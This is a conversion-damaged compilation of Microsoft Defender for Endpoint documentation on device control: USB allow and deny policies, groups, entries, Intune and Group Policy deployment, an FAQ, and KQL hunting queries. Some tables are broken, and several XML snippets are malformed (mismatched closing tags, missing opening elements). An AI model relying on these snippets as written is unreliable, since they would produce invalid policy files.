| where ActionType == "PnpDeviceConnected"
| extend MediaClass = tostring(parsed.ClassName)
| extend MediaDescription = tostring(parsed.DeviceDescription)
| where MediaClass == "USB"
| project Timestamp, DeviceId, DeviceName, AccountName, AccountDomain,
MediaClass, MediaDeviceId, MediaDescription, MediaSerialNumber, parsed
This example query filters the events by MediaClass . The default behavior can be
changed to deny all devices, or to exclude families of devices from device control.
Change the default behavior to deny, and then set device control only to apply to
removable storage.
For Intune, use a custom profile to set the device control settings, as follows:
Set ./Vendor/MSFT/Defender/Configuration/DeviceControlEnabled to 1
Set ./Vendor/MSFT/Defender/Configuration/DefaultEnforcement to 2
Set ./Vendor/MSFT/Defender/Configuration/SecuredDevicesConfiguration to
RemovableMediaDevices
Deploy your policy to the test device. Use Get-MpComputerStatus to confirm that the
default enforcement is set to Deny, as illustrated in the following snippet:
PowerShell
DeviceControlDefaultEnforcement : DefaultDeny
DeviceControlPoliciesLastUpdated : 1/4/2024 10:27:06 AM
DeviceControlState : Enabled
Remove, and reinsert the USB device in the test machine. Try to open the drive. The
drive isn't accessible, and a message appears which indicates that access is denied.
７ Note
Samples and instructions and examples are available here .
Step 1: Deny all removable media

In order to customize the behavior, device control uses policies that are a combination
of groups and rules. Start by deploying a policy that denies all access to all removable
storage devices, and audits the event by sending a notification to the portal and the
user. The following image summarizes these settings:

For the purposes of controlling access, devices are organized into Groups. This policy
uses a group called All removable media devices . Once this policy is deployed to the
test device, reinsert the USB. A notification appears, indicating that device access is
restricted.
The event also appears within 15 minutes in advanced hunting. You can use the
following example query to view the results:
Kusto
DeviceEvents
| where ActionType == "RemovableStoragePolicyTriggered"
| extend RemovableStorageAccess = tostring(parsed.RemovableStorageAccess)
| extend RemovableStoragePolicyVerdict =
tostring(parsed.RemovableStoragePolicyVerdict)
| extend MediaBusType = tostring(parsed.BusType)
| extend MediaClassGuid = tostring(parsed.ClassGuid)
| extend MediaClassName = tostring(parsed.ClassName)
| extend MediaInstanceId = tostring(parsed.DeviceInstanceId)
| extend MediaName = tostring(parsed.MediaName)
| extend RemovableStoragePolicy = tostring(parsed.RemovableStoragePolicy)
| extend MediaProductId = tostring(parsed.ProductId)
| extend MediaVendorId = tostring(parsed.VendorId)
|project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName,
ActionType, RemovableStorageAccess, RemovableStoragePolicyVerdict,
MediaBusType, MediaClassGuid, MediaClassName, MediaDeviceId,
MediaInstanceId, MediaName, RemovableStoragePolicy, MediaProductId,
MediaVendorId, MediaSerialNumber, FolderPath, FileSize
７ Note
You can view up to 300 events per device per day with advanced hunting.
Selecting the event to view information about the policy and the device.
Step 2: Allow access for authorized USB devices

To grant access to set of authorized USBs devices, set up a group to identify those
devices. We call our group Authorized USBs , and used the settings depicted in the
following image:
In our example, the authorized USBs group contains a single device identified by its
InstancePathId . Before deploying the sample, you can change the value to the
InstancePathId for a test device. See Using Windows Device Manager to determine
device properties and Using reports and advanced hunting to determine properties of
devices for details on how to find the correct value.
Notice that the authorized USB group is excluded from the deny-all policy. This ensures
that those devices are evaluated for the other policies. Policies aren't evaluated in order,
so each policy should be correct if evaluated independently. Once the policy is
deployed, reinsert the approved USB device. You should see that there's full access to
the device. Insert another USB, and confirm that access is blocked for that device.
Device control has lots of ways to group devices based on properties. For more
information, see Device control policies in Microsoft Defender for Endpoint.
Step 3: Allow different levels of access for

different types of devices
To create different behaviors for different devices, place them into separate groups. In
our example, we use a group called Read Only USBs . The following image shows the
settings we used:

In our example, the Read Only USB group contains a single device identified by its
VID_PID . Before deploying the sample, you can change the value of VID_PID to that of a
second test device.
Once the policy is deployed, insert an authorized USB. You should see that full access is
allowed. Now insert the second test device (Read Only USB). You can access the device
with read-only permissions. Attempt to create a new file, or make changes to a file, and
you should see that device control blocks it.
If you insert any other USB device, it should be blocked due to the "Deny all other USBs"
policy.
Step 4: Allow different levels of access to

devices for specific users or groups
Device control allows you to further restrict access using conditions. The simplest
condition is a user condition. In device control, users and groups are identified by their
Security Identified (SID).
The following screenshot shows the settings we used for our example:

By default, the sample uses the Global SID of S-1-1-0 . Before deploying the policy, you
can change the SID associated with the authorized USBs (writeable USBs) to User1 and
change the SID associated with the Read Only USBs to User2 .
Once the policy is deployed, only User 1 has write access to the Authorized USBs, and
only User 2 has read access to the ReadOnly USBs.
Device control also supports group SIDs. Change the SID in the read-only policy to a
group that contains User2 . Once the policy is redeployed, the rules are the same for
User 2 or any other user in that group.
７ Note
For groups that are stored in Microsoft Entra, use the object id instead of the SID to
identify groups of users.
Next steps
Understand Device control policies
Deploy and manage device control with Intune
Deploy and manage device control with Group Policy
View device control reports
Feedback

Device control policies in Microsoft
Article • 02/14/2024
Applies to:

This article describes device control policies, rules, entries, groups, and advanced
conditions. Essentially, device control policies define access for a set of devices. The
devices that are in scope are determined by a list of included device groups and a list of
excluded device groups. A policy applies if the device is in all of the included device
groups and none of the excluded device groups. If no policies apply, then the default
enforcement is applied.
By default device control is disabled, so access to all types of devices is allowed. To learn
more about device control, see Device control in Microsoft Defender for Endpoint.
Controlling default behavior

When device control is enabled, it's enabled for all device types by default. The default
enforcement can also be changed from Allow to Deny. Your security team can also
configure the types of devices that device control protects. The following table below
illustrates how various combinations of settings change the access control decision.
ﾉ Expand table
Is device control Default behavior Device types

enabled?
No Access is allowed - CD/DVD drives

- Printers
- Removable media devices
- Windows portable devices
Yes (Not specified) - CD/DVD drives

Access is allowed - Printers
Is device control Default behavior Device types
enabled?
Yes Deny - CD/DVD drives

- Printers
Yes Deny removable media devices - Printers and removable media devices
and printers (blocked)
- CD/DVD drives and Windows portable
devices (allowed)
When device types are configured, device control in Defender for Endpoint ignores
requests to other device families.
For more information, see the following articles:
Deploy and manage device control with Intune

Deploy and manage device control with Group Policy
Policies
To further refine access to devices, device control uses policies. A policy is a set of rules
and groups. How rules and groups are defined varies slightly among management
experiences and operating systems, as described in the following table.
ﾉ Expand table
Management Operating How rules and groups are managed

tool system
Intune – Device Windows Device and printer groups can be managed as reusable
control policy settings and included in rules. Not all features are available in
the device control policy (see Deploy and manage device
control with Microsoft Intune)
Intune – Custom Windows Each group/rule is stored as an XML string in custom

configuration policy. The OMA-URI contains the GUID of the
group/rule. The GUID must be generated.
Group Policy Windows The groups and rules are defined in separate XML settings in
the Group Policy Object (see Deploy and manage device
control with Group Policy).
Intune Mac The rules and policies are combined into a single JSON and
included in the mobileconfig file that is deployed by using
Management Operating How rules and groups are managed
tool system
Intune
JAMF Mac The rules and policies are combined into a single JSON and
configured by using JAMF as the device control policy (see
Device Control for macOS)
Rules and groups are identified by Global Unique ID (GUIDs). If device control policies
are deployed using a management tool other than Intune, the GUIDs must be
generated. You can generate the GUIDs by using PowerShell.
For schema details, see JSON schema for Mac .
Rules
A rule defines the list of included groups and a list of excluded groups. For the rule to
apply, the device must be in all of the included groups and none of the excluded
groups. If the device matches the rule, then the entries for that rule are evaluated. An
entry defines the action and notification options applied, if the request matches the
conditions. If no rules apply or no entries match the request then the default
enforcement is applied.
For example, to allow write access for some USB devices, and read access for all other
USB devices, use the following policies, groups, and entries with default enforcement set
to deny.
ﾉ Expand table
Group Description
All Removable Storage Devices Removable Storage Devices
Writeable USBs List of USBs where write access is permitted
ﾉ Expand table
Rule Included Device Groups Excluded Device Entry

Groups
Read only access for All Removable storage Writeable USBs Read Only
USBs devices Access
Write access for USBs Writeable USBs Write Access

The name of the rule appears in the portal for reporting and in the toast notification to
users, so make sure to give the rules descriptive names.
You can configure rules by editing policies in Intune, using an XML file in Windows, or
using a JSON file on Mac. Select each tab for more details.
Intune
The following image depicts configuration settings for a device control policy in
Intune:
In the screenshot, the Included ID and Excluded ID are the references to included
and excluded reusable settings groups. A policy can have multiple rules.
The ordering of the rules isn't honored by Intune. The rules can be evaluated in any
order, so make sure to explicitly exclude groups of devices that aren't in scope for
the rule.
Entries
Device control policies define access (called an entry) for a set of devices. Entries define
the action and notification options for devices that match the policy and the conditions
defined in the entry.
ﾉ Expand table
Entry setting Options
Action Allow
Deny
AuditAllow
AuditDeny
Entry setting Options
Notification None (default)

An event is generated
The user receives notification
File evidence is captured
If device control is configured, and a user attempts to use a device that's not allowed,
the user gets a notification that contains the name of the device control policy and the
name of the device. The notification appears once every hour after initial access is
denied.
An entry supports the following optional conditions:
Access Condition: Applies the action only to the access defined in the access mask
User Condition: Applies the action only to the user/group identified by the SID
Machine Condition: Applies the action only to the device/group identified by the
SID
Parameters Condition: Applies the action only if the parameters match (See
Advanced Conditions)
Entries can be further scoped to specific users and devices. For example, allow read
access to these USBs for this user only on this device.
ﾉ Expand table
Policy Included Device Excluded Device Entry(ies)

Groups Groups
Read only access All Removable storage Writeable USBs Read Only Access
for USBs devices
Write access for Writeable USBs Write Access for User 1

USBs
Write Access for User 2 on
Device Group A
All of the conditions in the entry must be true for the action to be applied.
Determine the Security ID of a User, Group, or Device

Entries can include user, group, or device restrictions based on Security ID (SID). The SID
of the user who's signed in can be retrieved by running the PowerShell command
whoami /user .
You can configure entries using Intune, an XML file in Windows, or a JSON file on Mac.
Select each tab for more details.
Intune
In Intune, the Access mask field has options, such as:
Read (Disk Level Read = 1)

Write (Disk Level Write = 2)
Execute (Disk Level Execute = 4)
Print (Print = 64).
Not all features are shown in the Intune user interface. For more information, see
Deploy and manage device control with Intune.
Groups
Groups define criteria for filtering objects by their properties. The object is assigned to
the group if its properties match the properties defined for the group.
For example:
Allowed USBs are all the devices that match any of these manufacturers
Lost USBs are all the devices that match any of these serial numbers
Allowed printers are all the devices that match any of these VID/PID
The properties can be matched in four ways: MatchAll , MatchAny , MatchExcludeAll , and
MatchExcludeAny
MatchAll : The properties are an "And" relationship; for example, if administrator
puts DeviceID and InstancePathID , for every connected USB, the system checks to
see whether the USB meets both values.
MatchAny : The properties are an "Or" relationship; for example, if administrator
puts DeviceID and InstancePathID , for every connected USB, the system enforces
as long as the USB has either an identical DeviceID or InstanceID value.
MatchExcludeAll : The properties are an "And" relationship, any items that do NOT
meet are covered. For example, if administrator puts DeviceID and InstancePathID
and uses MatchExcludeAll , for every connected USB, system enforces as long as
the USB doesn't have both identical DeviceID and InstanceID value.
MatchExcludeAny : The properties are an "Or" relationship, any items that do NOT
meet are covered. For example, if administrator puts DeviceID and InstancePathID
and uses MatchExcludeAny , for every connected USB, system enforces as long as
the USB doesn't have either an identical DeviceID or InstanceID value.
Groups are used two ways: to select devices for inclusion/exclusion in rules, and to filter
access for advanced conditions. This table summarizes the group types and how they're
used.
ﾉ Expand table
Type Description O/S Include/Exclude Advanced

Rules conditions
Device Filter devices and Windows/Mac X

(default) printers
Network Filter network Windows X

conditions
VPN Filter VPN conditions Windows X

Connection
File Filter file properties Windows X
Print Job Filter properties of the Windows X

file being printed
The devices that are in scope for the policy determined by a list of included groups and
a list of excluded groups. A rule applies if the device is in all of the included groups and
none of the excluded groups. Groups can be composed from the properties of devices.
The following properties can be used:
ﾉ Expand table
Property Description Windows Mac Printers

devices devices
FriendlyNameId The friendly name in Windows Device Y N Y

Manager
PrimaryId The type of the device Y Y Y
VID_PID Vendor ID is the four-digit vendor Y N Y

code that the USB committee assigns
to the vendor. Product ID is the four-
digit product code that the vendor
assigns to the device. Wildcards are
supported. For example, 0751_55E0
Property Description Windows Mac Printers
devices devices
PrinterConnectionId The type of printer connection: N N Y

- USB
- Corporate
- Network
- Universal
- File
- Custom
- Local
BusId Information about the device (for Y N N

more information, see the sections
that follow this table)
DeviceId Information about the device (for Y N N

HardwareId Information about the device (for Y N N

InstancePathId Information about the device (for Y N N

SerialNumberId Information about the device (for Y Y N

PID Product ID is the four-digit product Y Y N

code that the vendor assigns to the
device
VID Vendor ID is the four-digit vendor Y Y N

code that the USB committee assigns
to the vendor.
APFS Encrypted If the device is APFS encrypted N Y N
Using Windows Device Manager to determine device

properties
For Windows devices, you can use Device Manager to understand the properties of
devices.
1. Open Device Manager, locate the device, right-click on Properties, and then select
the Details tab.
2. In the Property list, select Device instance path.
The value shown for device instance path is the InstancePathId , but it also
contains other properties:
USB\VID_090C&PID_1000\FBH1111183300721
{BusId}\{DeviceId}\{SerialNumberId}
The properties in the device manager map to device control as shown in the
following table:
ﾉ Expand table
Device Manager Device Control
Hardware Ids HardwareId
Friendly name FriendlyNameId
Parent VID_PID
DeviceInstancePath InstancePathId
Using reports and advanced hunting to determine

properties of devices
Device properties have slightly different labels in advanced hunting. The table below
maps the labels in the portal to the propertyId in a device control policy.
ﾉ Expand table
Microsoft Defender Portal property Device control property Id
Media name FriendlyNameId
Vendor Id HardwareId
DeviceId InstancePathId
Serial Number SerialNumberId
７ Note
Make sure that the object selected has the correct Media Class for the policy. In
general, for removable storage, use Class Name == USB .
Configure groups in Intune, XML in Windows, or JSON on

Mac
You can configure groups in Intune, by using an XML file for Windows, or by using a
JSON file on Mac. Select each tab for more details.
Intune
Reusable settings in Intune map to device groups. You can configure reusable
settings in Intune.
There are two types of groups: Printer Device and Removable Storage. The
following table lists the properties for these groups.
ﾉ Expand table
Group type Properties
Printer device - FriendlyNameId

- PrimaryId
- PrinterConnectionId
- VID_PID
Removable storage - BusId

- DeviceId
- FriendlyNameId
- HardwareId
Group type Properties
- InstancePathId
- PID
- PrimaryId
- SerialNumberId
- VID
- VID_PID
Advanced conditions
Entries can be further restricted based on parameters. Parameters apply advanced
conditions that go beyond the device. Advanced conditions allow for fine-grained
control based on Network, VPN Connection, File or Print Job being evaluated.
７ Note
Advanced conditions are only supported in the XML format.
Network Conditions
The following table describes network group properties:
ﾉ Expand table
NameId The name of the network. Wildcards are supported.
NetworkCategoryId Valid options are Public , Private , or DomainAuthenticated .
NetworkDomainId Valid options are NonDomain , Domain , DomainAuthenticated .
These properties are added to the DescriptorIdList of a group of type Network. Here's
an example snippet:
XML
<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30a}" Type="Network"

MatchType="MatchAll">
<DescriptorIdList>
<NetworkCategoryId>Public</PathId>
<NetworkDomainId>NonDomain</PathId>
</DescriptorIdList>
</Group>
The group is then referenced as parameters in the entry, as illustrated in the following
snippet:
XML
<Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}">
<Type>Deny</Type>
<Options>0</Options>
<AccessMask>40</AccessMask>
<Parameters MatchType="MatchAll">
<Network MatchType="MatchAny">
<GroupId>{ e5f619a7-5c58-4927-90cd-75da2348a30a }
</GroupId>
</Network>
</Parameters>
</Entry>
VPN Connection Conditions

The following table describes VPN connection conditions:
ﾉ Expand table
Name Description
NameId The name of the VPN Connection. Wildcards are supported.
VPNConnectionStatusId Valid values are Connected or Disconnected .
VPNServerAddressId The string value of VPNServerAddress . Wildcards are supported.
VPNDnsSuffixId The string value of VPNDnsSuffix . Wildcards are supported.
These properties are added to the DescriptorIdList of a group of type VPNConnection,

as shown in the following snippet:
XML
<Group Id="{d633d17d-d1d1-4c73-aa27-c545c343b6d7}" Type="VPNConnection">

<Name>Corporate VPN</Name>
<MatchType>MatchAll</MatchType>
<DescriptorIdList>
<NameId>ContosoVPN</NameId>
<VPNServerAddressId>contosovpn.*.contoso.com</VPNServerAddressId>
<VPNDnsSuffixId>corp.contoso.com</VPNDnsSuffixId>
<VPNConnectionStatusId>Connected</VPNConnectionStatusId>
</DescriptorIdList>
</Group>
Then the group is then referenced as parameters in an entry, as illustrated in the

following snippet:
XML
<Entry Id="{27c79875-25d2-4765-aec2-cb2d1000613f}">
<Type>Allow</Type>
<Parameters MatchType="MatchAny">
<VPNConnection>
<GroupId>{d633d17d-d1d1-4c73-aa27-c545c343b6d7}
</GroupId>
</VPNConnection>
</Parameters>
</Entry>
File Conditions
The following table describes file group properties:
ﾉ Expand table
Name Description
PathId String, value of file path or name.

Wildcards are supported.
Only applicable for file type groups.
The following table illustrates how properties are added to the DescriptorIdList of a
file group:
XML
<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30f}" Type="File"

MatchType="MatchAny">
<DescriptorIdList>
<PathId>*.exe</PathId>
<PathId>*.dll</PathId>
</DescriptorIdList>
</Group>
The group is then referenced as parameters in an entry, as illustrated in the following

snippet:
XML
<Type>Deny</Type>
<File MatchType="MatchAny">
<GroupId>{ e5f619a7-5c58-4927-90cd-75da2348a30f }
</GroupId>
</File>
</Parameters>
</Entry>
Print Job Conditions

The following table describes PrintJob group properties:
ﾉ Expand table
Name Description
PrintOutputFileNameId The output destination file path for print to file. Wildcards are
supported. For example, C:\*\Test.pdf
PrintDocumentNameId The source file path. Wildcards are supported. This path might not exist.
For example, add text to a new file in Notepad, and then print without
saving the file.
These properties are added to the DescriptorIdList of a group of type PrintJob , as

illustrated in the following snippet:
XML
<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30b}" Type="PrintJob"
MatchType="MatchAny">
<DescriptorIdList>
<PrintOutputFileNameId>C:\Documents\*.pdf</PrintOutputFileNameId >
<PrintDocumentNameId>*.xlsx</PrintDocumentNameId>
<PrintDocumentNameId>*.docx</PrintDocumentNameId>
</DescriptorIdList>
</Group>
The group is then referenced as parameters in an entry, as illustrated in the following

snippet:
XML
<Type>Deny</Type>
<PrintJob MatchType="MatchAny">
<GroupId>{e5f619a7-5c58-4927-90cd-75da2348a30b}</GroupId>
</PrintJob>
</Parameters>
</Entry>
File evidence
With device control, you can store evidence of files that were copied to removable
devices or were printed. When file evidence is enabled, a RemovableStorageFileEvent is
created. The behavior of file evidence is controlled by options on the Allow action, as
described in the following table:
ﾉ Expand table
Option Description
8 Create a RemovableStorageFileEvent event with FileEvidenceLocation
16 Create a RemovableStorageFileEvent without FileEvidenceLocation
The FileEvidenceLocation field of has the location of the evidence file, if one is created.
The evidence file has a name which ends in .dup , and its location is controlled by the
DataDuplicationFolder setting.
Next steps
View device control events and information in Microsoft Defender for Endpoint
Deploy and manage device control in Microsoft Defender for Endpoint with
Microsoft Intune
Deploy and manage device control in Microsoft Defender for Endpoint using
Group Policy
Feedback

Deploy and manage device control in
Microsoft Defender for Endpoint with
Microsoft Intune
Article • 02/23/2024
Applies to:

If you're using Intune to manage Defender for Endpoint settings, you can use it to
deploy and manage device control capabilities. Different aspects of device control are
managed differently in Intune, as described in the following sections.
Configure and manage device control in Intune

1. Go to the Intune admin center and sign in.
2. Go to Endpoint security > Attack surface reduction.
3. Under Attack surface reduction policies, either select an existing policy, or select
+ Create Policy to set up a new policy, using these settings:
In the Platform list, select Windows 10, Windows 11, and Windows Server.
(Device control is not currently supported on Windows Server, even though
you select this profile for device control policies.)
In the Profile list, select Device Control.
4. On the Basics tab, specify a name and description for your policy.
5. On the Configuration settings tab, you see a list of settings. You don't have to
configure all of these settings at once. Consider starting with Device Control.

Under Administrative Templates, you have Device Installation and

Removable Storage Access settings.
Under Defender, see Allow Full Scan Removable Drive Scanning settings.
Under Data Protection, see Allow Direct Memory Access settings.
Under Dma Guard, see Device Enumeration Policy settings.
Under Storage, see Removable Disk Deny Write Access settings.
Under Connectivity, see Allow USB Connection** and Allow Bluetooth
settings.
Under Bluetooth, see a list of settings that pertain to Bluetooth connections
and services. For more details, see Policy CSP - Bluetooth.
Under Device Control, you can configure custom policies with reusable
settings. For more details, see Device control overview: Rules.
6. After you have configured your settings, proceed to the Scope tags tab, where you
can specify scope tags for the policy.
7. On the Assignments tab, specify groups of users or devices to receive your policy.
For more details, see Assign policies in Intune.
8. On the Review + create tab, review your settings, and make any needed changes.
9. When you're ready, select Create to create your device control policy.
Device control profiles

In Intune, each row represents a device control policy. The included ID is the reusable
setting that the policy applies to. The excluded ID is the reusable setting that's excluded
from the policy. The entry for the policy contains the permissions allowed and the
behavior for device control that comes into force when the policy applies.
For information on how to add the reusable groups of settings that are included in the
row of each device control policy, see the Add reusable groups to a Device Control profile
section in Use reusable groups of settings with Intune policies.
Policies can be added and removed using the + and – icons. The name of the policy
appears in the warning to users, and in advanced hunting and reports.
You can add audit policies, and you can add Allow/Deny policies. It is recomended to
always add an Allow and/or Deny policy when adding an audit policy so that you don't
experience unexpected results.
） Important
If you only configure audit policies, the permissions are inherited from the default
enforcement setting.
７ Note
The order in the which policies are listed in the user interface isn't preserved
for policy enforcement. The best practice is to use Allow/Deny policies.
Ensure that the Allow/Deny policies option is non-intersecting by explicitly
adding devices to be excluded. Using Intune's graphical interface, you cannot
change the default enforcement. If you change the default enforcement to
Deny, any allow policy results in blocking actions.
Defining Settings with OMA-URI
In the following table, identify the setting you want to configure, and then use the
information in the OMA-URI and data type & values columns. Settings are listed in
alphabetical order.
ﾉ Expand table
Setting OMA-URI, data type, & values
Device control ./Vendor/MSFT/Defender/Configuration/DefaultEnforcement

default
enforcement Integer:
Default - DefaultEnforcementAllow = 1
enforcement - DefaultEnforcementDeny = 2
establishes what
decisions are
made during
device control
access checks
when none of the
policy rules match
Device types ./Vendor/MSFT/Defender/Configuration/SecuredDevicesConfiguration

Device types,
identified by their String:
Primary IDs, with - RemovableMediaDevices
device control - CdRomDevices
protection turned - WpdDevices
on - PrinterDevices
Enable device ./Vendor/MSFT/Defender/Configuration/DeviceControlEnabled

control
Enable or disable Integer:
device control on - Disable = 0
the device - Enable = 1
Evidence data ./Vendor/MSFT/Defender/Configuration/DataDuplicationRemoteLocation

remote location
Device control String
moves evidence
data captured
Local evidence ./Vendor/MSFT/Defender/Configuration/DataDuplicationLocalRetentionPeriod

cache duration
Sets the retention Integer
period in days for Example: 60 (60 days)
files in the local
Setting OMA-URI, data type, & values
device control
cache
Creating policies with OMA-URI
When you create policies with OMA-URI in Intune, create one XML file for each policy.
As a best practice, use the Device Control Profile or Device Control Rules Profile to
author custom policies.
In the Add Row pane, specify the following settings:
In the Name field, type Allow Read Activity .

In the OMA-URI field, type
/Vendor/MSFT/Defender/Configuration/DeviceControl/PolicyRules/%7b[PolicyRule
Id]%7d/RuleData .
In the Data Type field, select String (XML file), and use Custom XML.
You can use parameters to set conditions for specific entries. Here's a group example
XML file for Allow Read access for each removable storage .
７ Note
Comments using XML comment notation can be used in the Rule and Group XML
files, but they must be inside the first XML tag, not the first line of the XML file.
Creating groups with OMA-URI
When you create groups with OMA-URI in Intune, create one XML file for each group.
As a best practice, use reusable settings to define groups.
In the Add Row pane, specify the following settings:
In the Name field, type Any Removable Storage Group .

In the OMA-URI field, type
./Vendor/MSFT/Defender/Configuration/DeviceControl/PolicyGroups/%7b**
[GroupId]**%7d/GroupData . (To get your GroupID, in the Intune admin center, go to
Groups, and then select Copy the Object ID.)

In the Data Type field, select String (XML file), and use Custom XML.
７ Note
Comments using XML comment notation  can be used in the Rule
and Group XML files, but they must be inside the first XML tag, not the first line of
the XML file.
Define Policies

1. Create one XML file for access policy rule.
2. Use the properties in removable storage access policy rule(s) to create an XML for
each group's removable storage access policy rule.
3. Save the XML file to network share.
4. Define the settings as follows:
a. On a device running Windows, go to Computer Configuration > Administrative

Control > Define device control policy rules.
b. In the Define device control policy rules window, select Enabled, and then
specify the network share file path containing the XML rules data.
７ Note
Comments using XML comment notation  can be used in the Rule
and Group XML files, but they must be inside the first XML tag, not the first line of
the XML file.
Set location for a copy of the file (evidence)


If you want to have a copy of the file (evidence) having Write access, set right Options in
your removable storage access policy rule in the XML file, and then specify the location
where system can save the copy.

Control > Define Device Control evidence data remote location.
2. In the Define Device Control evidence data remote location window, select
Enabled, and then specify the local or network share folder path.
Retention period for local evidence cache

If you want to change the default value of 60 days for persisting the local cache for file
evidence, follow these steps:
1. Go to Computer Configuration > Administrative Templates > Windows

Components > Microsoft Defender Antivirus > Device Control > Set the
retention period for files in the local device control cache.
2. In the Set the retention period for files in the local device control cache window,
select Enabled, and then enter the number of days to retain the local cache
(default 60).
See also
Device control in Defender for Endpoint
Device control policies in and settings
Feedback

Microsoft Defender for Endpoint Device
Control frequently asked questions
Article • 02/01/2024
Applies to:

This article provides answers to frequently asked questions about device control
removable storage capabilities in Microsoft Defender for Endpoint.
How do I generate GUID for Group

ID/PolicyRule ID/Entry ID?
You can generate the GUID through online open source or by using PowerShell. For
more information, see How to generate GUID through PowerShell.
What are the removable storage media and

policy limitations?
The backend call is done through OMA-URI (GET to read or PATCH to update) either
from Intune or through Microsoft Graph API. The limitation is the same as any OMA-URI
custom configuration profile at Microsoft, which is officially 350,000 characters for XML
files. For example, if you need two blocks of entries per user SID to "Allow" / "Audit
allowed" specific users, and then two blocks of entries at the end to "Deny" all, you'll be
able to manage 2,276 users.
Why doesn't the policy work?

The most common reason is there's no required anti-malware client version.
Another reason could be that the XML file isn't correctly formatted. For example, not
using the correct markdown formatting for the "&" character in the XML file or the text
editor might add a byte order mark (BOM) 0xEF 0xBB 0xBF at the beginning of the files
causing the XML parsing not to work. One simple solution is to download the sample
file (select Raw and then Save as), and then update.
If you're deploying and managing the policy by using Group Policy, make sure to
combine all policy rules into one XML file within a parent node called PolicyRules . Also,
combine all groups into one XML file within a parent node called Groups . If you're
managing devices with Intune, keep separate XML files for each group and policy when
deploying as Custom OMA-URI .
The device (machine) should have a valid certificate. Run the following command on the
machine to check:
Get-AuthenticodeSignature C:\Windows\System32\wbem\WmiPrvSE.exe
If the policy still isn't working, contact support, and share your support cab. To get that
file, open Command Prompt as an administrator, and then use the following command:
"%programfiles%\Windows Defender\MpCmdRun.exe" -GetFiles
Why is there no configuration UX for some

policy groups?
There is no configuration UX for Define device control policy groups and Define device
control policy rules on your Group Policy. But, you can still get the related .adml and
.admx files by selecting Raw and Save as at the WindowsDefender.adml and
WindowsDefender.admx files.
How do I confirm that the latest policy has

been deployed to the target machine?
You can run the PowerShell cmdlet Get-MpComputerStatus as an administrator. The
following value will show whether the latest policy has been applied to the target
machine.
How can I know which machine is using out of

date anti-malware client version in the
organization?
You can use following query to get anti-malware client version on the Microsoft 365
security portal:
Kusto
//check the anti-malware client version

DeviceFileEvents
|where FileName == "MsMpEng.exe"
|where FolderPath contains @"C:\ProgramData\Microsoft\Windows
Defender\Platform\"
|extend PlatformVersion=tostring(split(FolderPath, "\\", 5))
//|project DeviceName, PlatformVersion // check which machine is using
legacy platformVersion
|summarize dcount(DeviceName) by PlatformVersion // check how many machines
are using which platformVersion
|order by PlatformVersion desc
How do I find the media property in the Device

Manager?
1. Plug in the media.
2. Open Device Manager.
3. Locate the media in the Device Manager, right-click, and then select Properties.
4. Open Details, and then select Properties.
Another way is to deploy an Audit policy to the organization, and see the events in
advanced hunting or the device control report.
How do I find Sid for Microsoft Entra group?
Different from Microsoft Entra groups, the Sid is using Object Id for Microsoft Entra
group. You can find the Object Id from Azure portal.
Why is my printer blocked in my organization?

The Default Enforcement setting is for all device control components, which means if
you set it to Deny , it will block all printers as well. You can either create custom policy to
explicitly allow printers or you can replace the Default Enforcement policy with a custom
policy.
Why is creating a folder not blocked by File

system level access?
Creating an empty folder will not be blocked even if File system level access Write
access Deny is configured. Any non-empty file will be blocked.
Why is my USB still blocked with an allow-

ready policy?
Some specific USB devices require more than Read access, the following list shows some
examples:
1. To Read access some Kingston encrypted USBs requires Execute access for its
CDROM.
2. To Read access some WD My Passport USBs requires Disk level Write access. For
this case, if you want to deny Write access, you should use the File system level
access
The best way to understand this is to check the event on the Advanced hunting which
will clearly show what accessMask is required.
Can I use both Group Policy and Intune deploy

policies?
You can use Group Policy and Intune to manage device control, but for one machine,
use either Group Policy or Intune. If a machine is covered by both, device control will
only apply the Group Policy setting.
Is device control available in Microsoft

Defender for Business?
Yes, for Windows and Mac.
To set up device control on Windows, use attack surface reduction rules in Defender for
Business. You'll need Microsoft Intune. The standalone version of Defender for Business
does not include Intune, but it can be added on. Microsoft 365 Business Premium does
include Intune. See Microsoft Defender for Endpoint Device Control Removable Storage
Access Control.
To set up device control on Mac, use Intune or Jamf. See Device Control for macOS.
 Tip
Feedback
View device control events and
information in Microsoft Defender for
Endpoint
Article • 02/02/2024
Microsoft Defender for Endpoint device control helps protect your organization from
potential data loss, malware, or other cyberthreats by allowing or preventing certain
devices to be connected to users' computers. You can view information about device
control events with advanced hunting or by using the device control report.
To access the Microsoft Defender portal , your subscription must include Microsoft 365
for E5 reporting.
Select each tab to learn more about advanced hunting and the device control report.
Advanced hunting
Advanced hunting
Applies to:

When a device control policy is triggered, an event is visible with advanced hunting,
regardless of whether it was initiated by the system or by the user who signed in.
This section includes some example queries you can use in advanced hunting.
Example 1: Removable storage policy triggered by disk

and file system level enforcement
When a RemovableStoragePolicyTriggered action occurs, event information about
the disk and file system level enforcement is available.
 Tip
Currently, in advanced hunting, there's a limit of 300 events per device per day
for RemovableStoragePolicyTriggered events. Use the device control report to
view additional data.
Kusto
//RemovableStoragePolicyTriggered: event triggered by Disk and file

system level enforcement for both Printer and Removable storage based on
your policy
DeviceEvents
| where ActionType == "RemovableStoragePolicyTriggered"
| extend RemovableStorageAccess =
tostring(parsed.RemovableStorageAccess)
| extend RemovableStoragePolicyVerdict =
tostring(parsed.RemovableStoragePolicyVerdict)
| extend MediaBusType = tostring(parsed.BusType)
| extend MediaClassGuid = tostring(parsed.ClassGuid)
| extend MediaInstanceId = tostring(parsed.DeviceInstanceId)
| extend RemovableStoragePolicy =
tostring(parsed.RemovableStoragePolicy)
|project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName,
ActionType, RemovableStorageAccess, RemovableStoragePolicyVerdict,
MediaBusType, MediaClassGuid, MediaClassName, MediaDeviceId,
MediaInstanceId, MediaName, RemovableStoragePolicy, MediaProductId,
MediaVendorId, MediaSerialNumber, FolderPath, FileSize
Example 2: Removable storage file event

When a RemovableStorageFileEvent action occurs, information about the evidence
file is available for both printer protection and removable storage. Here's an
example query you can use with advanced hunting:
Kusto
//information of the evidence file

DeviceEvents
| where ActionType contains "RemovableStorageFileEvent"
| extend Policy = tostring(parsed.Policy)
| extend PolicyRuleId = tostring(parsed.PolicyRuleId)
| extend MediaInstanceId = tostring(parsed.InstanceId)
